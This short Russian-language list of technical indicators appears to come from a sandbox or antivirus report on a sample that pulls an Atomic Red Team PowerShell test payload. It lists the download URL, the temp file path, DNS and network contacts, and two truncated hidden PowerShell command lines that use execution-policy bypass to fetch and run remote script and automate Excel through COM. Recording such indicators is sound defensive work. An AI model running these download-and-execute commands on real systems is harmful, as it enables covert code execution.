Техническая информация
- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/t1086/payloads/test.ps1
- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/t1086/payloads/test.ps1 (сохраняется как %windir%\temp\ps4q8j7elk0vz51miynatd36grbouxch)
- 'ra#.####ubusercontent.com':443
- 'ra#.####ubusercontent.com':443
- DNS ASK ra#.####ubusercontent.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -windowstyle hidden -noprofile "$sr=New-Object System.IO.StreamReader((New-Object Net.WebClient).OpenRead('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atom... [командная строка обрезана в источнике]
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -windowstyle hidden -noprofile "$comExcel=New-Object -ComObject Excel.Application;While($comExcel.Busy){Start-Sleep -Seconds 1}$comExcel.DisplayAlerts=$False;$Null=$comExcel.Workbo... [командная строка обрезана в источнике]